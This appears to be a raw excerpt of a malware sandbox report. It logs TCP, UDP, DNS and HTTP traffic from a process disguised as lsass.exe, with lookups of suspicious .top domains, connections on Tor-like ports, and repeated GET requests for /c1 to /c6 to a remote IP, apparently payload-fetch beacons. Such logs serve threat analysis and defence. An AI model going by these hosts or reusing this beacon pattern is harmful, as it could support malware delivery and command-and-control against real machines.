Jan 10, 2024 15:41:39.371665001 CET	49759	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:41:39.371681929 CET	443	49759	172.81.131.84	192.168.2.6
Jan 10, 2024 15:41:39.400532961 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.547022104 CET	9000	49758	107.189.8.226	192.168.2.6
Jan 10, 2024 15:41:39.547849894 CET	49758	9000	192.168.2.6	107.189.8.226
Jan 10, 2024 15:41:39.548511982 CET	49758	9000	192.168.2.6	107.189.8.226
Jan 10, 2024 15:41:39.725694895 CET	9000	49758	107.189.8.226	192.168.2.6
Jan 10, 2024 15:41:39.725835085 CET	443	49759	172.81.131.84	192.168.2.6
Jan 10, 2024 15:41:39.725917101 CET	49759	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:41:39.726200104 CET	9000	49758	107.189.8.226	192.168.2.6
Jan 10, 2024 15:41:39.726238012 CET	9000	49758	107.189.8.226	192.168.2.6
Jan 10, 2024 15:41:39.726672888 CET	49758	9000	192.168.2.6	107.189.8.226
Jan 10, 2024 15:41:39.727122068 CET	49758	9000	192.168.2.6	107.189.8.226
Jan 10, 2024 15:41:39.727634907 CET	49759	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:41:39.727657080 CET	443	49759	172.81.131.84	192.168.2.6
Jan 10, 2024 15:41:39.727952957 CET	443	49759	172.81.131.84	192.168.2.6
Jan 10, 2024 15:41:39.728521109 CET	49759	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:41:39.732988119 CET	49760	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:41:39.773905993 CET	443	49759	172.81.131.84	192.168.2.6
Jan 10, 2024 15:41:39.904907942 CET	9000	49758	107.189.8.226	192.168.2.6
Jan 10, 2024 15:41:39.926037073 CET	80	49760	86.59.21.38	192.168.2.6
Jan 10, 2024 15:41:39.929678917 CET	49760	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:41:39.929946899 CET	49760	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:41:40.121692896 CET	80	49760	86.59.21.38	192.168.2.6
Jan 10, 2024 15:41:40.637095928 CET	80	49760	86.59.21.38	192.168.2.6
Jan 10, 2024 15:41:40.637126923 CET	80	49760	86.59.21.38	192.168.2.6
Jan 10, 2024 15:41:40.637198925 CET	49760	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:41:40.637404919 CET	49760	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:41:40.640316963 CET	49761	443	192.168.2.6	131.188.40.189
Jan 10, 2024 15:41:40.640398979 CET	443	49761	131.188.40.189	192.168.2.6
Jan 10, 2024 15:41:40.640490055 CET	49761	443	192.168.2.6	131.188.40.189
Jan 10, 2024 15:41:40.640779018 CET	49761	443	192.168.2.6	131.188.40.189
Jan 10, 2024 15:41:40.640809059 CET	443	49761	131.188.40.189	192.168.2.6
Jan 10, 2024 15:41:40.640880108 CET	443	49761	131.188.40.189	192.168.2.6
Jan 10, 2024 15:41:40.648189068 CET	49762	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:41:40.829551935 CET	80	49760	86.59.21.38	192.168.2.6
Jan 10, 2024 15:41:41.703931093 CET	49762	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:41:43.703957081 CET	49762	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:41:47.703881979 CET	49762	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:41:55.703932047 CET	49762	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:41:59.735457897 CET	49759	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:41:59.735488892 CET	443	49759	172.81.131.84	192.168.2.6
Jan 10, 2024 15:41:59.735714912 CET	443	49759	172.81.131.84	192.168.2.6
Jan 10, 2024 15:41:59.735755920 CET	443	49759	172.81.131.84	192.168.2.6
Jan 10, 2024 15:41:59.735802889 CET	49759	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:41:59.860322952 CET	49759	443	192.168.2.6	172.81.131.84

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2024 15:38:00.026719093 CET	54166	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:38:00.177167892 CET	53	54166	1.1.1.1	192.168.2.6
Jan 10, 2024 15:38:35.129169941 CET	65388	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:38:35.492938995 CET	53	65388	1.1.1.1	192.168.2.6
Jan 10, 2024 15:38:39.564996004 CET	58361	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:38:39.670294046 CET	53	58361	1.1.1.1	192.168.2.6
Jan 10, 2024 15:38:42.707699060 CET	64590	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:38:43.326620102 CET	53	64590	1.1.1.1	192.168.2.6
Jan 10, 2024 15:38:47.608666897 CET	57035	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:38:48.203423023 CET	53	57035	1.1.1.1	192.168.2.6
Jan 10, 2024 15:38:51.258502960 CET	53795	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:38:52.013695002 CET	53	53795	1.1.1.1	192.168.2.6
Jan 10, 2024 15:38:56.080550909 CET	54956	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:38:56.451299906 CET	53	54956	1.1.1.1	192.168.2.6
Jan 10, 2024 15:40:44.035413027 CET	63076	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:40:44.140208006 CET	53	63076	1.1.1.1	192.168.2.6
Jan 10, 2024 15:40:49.365242958 CET	57321	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:40:49.693957090 CET	53	57321	1.1.1.1	192.168.2.6
Jan 10, 2024 15:40:52.737531900 CET	64703	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:40:53.091784000 CET	53	64703	1.1.1.1	192.168.2.6
Jan 10, 2024 15:40:58.159080029 CET	63191	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:40:58.524116993 CET	53	63191	1.1.1.1	192.168.2.6
Jan 10, 2024 15:41:00.551562071 CET	59149	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:41:00.923995972 CET	53	59149	1.1.1.1	192.168.2.6
Jan 10, 2024 15:41:05.960225105 CET	64253	53	192.168.2.6	1.1.1.1
Jan 10, 2024 15:41:06.063793898 CET	53	64253	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2024 15:38:00.026719093 CET	192.168.2.6	1.1.1.1	0x2359	Standard query (0)	api.wipmania.com	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:35.129169941 CET	192.168.2.6	1.1.1.1	0xeda7	Standard query (0)	feedmefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:39.564996004 CET	192.168.2.6	1.1.1.1	0x7e5e	Standard query (0)	feedmefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:42.707699060 CET	192.168.2.6	1.1.1.1	0x7e	Standard query (0)	gotsomefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:47.608666897 CET	192.168.2.6	1.1.1.1	0x8d7f	Standard query (0)	gotsomefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:51.258502960 CET	192.168.2.6	1.1.1.1	0xfaef	Standard query (0)	gimmefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:56.080550909 CET	192.168.2.6	1.1.1.1	0x556c	Standard query (0)	gimmefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:40:44.035413027 CET	192.168.2.6	1.1.1.1	0x9df8	Standard query (0)	feedmefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:40:49.365242958 CET	192.168.2.6	1.1.1.1	0x29bd	Standard query (0)	feedmefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:40:52.737531900 CET	192.168.2.6	1.1.1.1	0x6805	Standard query (0)	gotsomefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:40:58.159080029 CET	192.168.2.6	1.1.1.1	0x5f6f	Standard query (0)	gotsomefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:41:00.551562071 CET	192.168.2.6	1.1.1.1	0x5879	Standard query (0)	gimmefile.top	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:41:05.960225105 CET	192.168.2.6	1.1.1.1	0x2614	Standard query (0)	gimmefile.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2024 15:38:00.177167892 CET	1.1.1.1	192.168.2.6	0x2359	No error (0)	api.wipmania.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:35.492938995 CET	1.1.1.1	192.168.2.6	0xeda7	Name error (3)	feedmefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:39.670294046 CET	1.1.1.1	192.168.2.6	0x7e5e	Name error (3)	feedmefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:43.326620102 CET	1.1.1.1	192.168.2.6	0x7e	Name error (3)	gotsomefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:48.203423023 CET	1.1.1.1	192.168.2.6	0x8d7f	Name error (3)	gotsomefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:52.013695002 CET	1.1.1.1	192.168.2.6	0xfaef	Name error (3)	gimmefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:38:56.451299906 CET	1.1.1.1	192.168.2.6	0x556c	Name error (3)	gimmefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:40:44.140208006 CET	1.1.1.1	192.168.2.6	0x9df8	Name error (3)	feedmefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:40:49.693957090 CET	1.1.1.1	192.168.2.6	0x29bd	Name error (3)	feedmefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:40:53.091784000 CET	1.1.1.1	192.168.2.6	0x6805	Name error (3)	gotsomefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:40:58.524116993 CET	1.1.1.1	192.168.2.6	0x5f6f	Name error (3)	gotsomefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:41:00.923995972 CET	1.1.1.1	192.168.2.6	0x5879	Name error (3)	gimmefile.top	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2024 15:41:06.063793898 CET	1.1.1.1	192.168.2.6	0x2614	Name error (3)	gimmefile.top	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.215.113.93

193.11.164.243:9030

199.58.81.140

86.59.21.38

149.56.45.200:9030

131.188.40.189:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49719	185.215.113.93	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:38:25.268291950 CET	170	OUT	GET /c1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:38:25.509865999 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:38:25 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2024 15:38:26.519258022 CET	170	OUT	GET /c2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:38:26.760479927 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:38:26 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2024 15:38:27.946547031 CET	170	OUT	GET /c3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:38:28.190026999 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:38:28 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2024 15:38:30.354223967 CET	170	OUT	GET /c4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:38:30.595370054 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:38:30 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2024 15:38:31.611371994 CET	170	OUT	GET /c5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:38:31.852922916 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:38:31 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2024 15:38:32.863312960 CET	170	OUT	GET /c6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
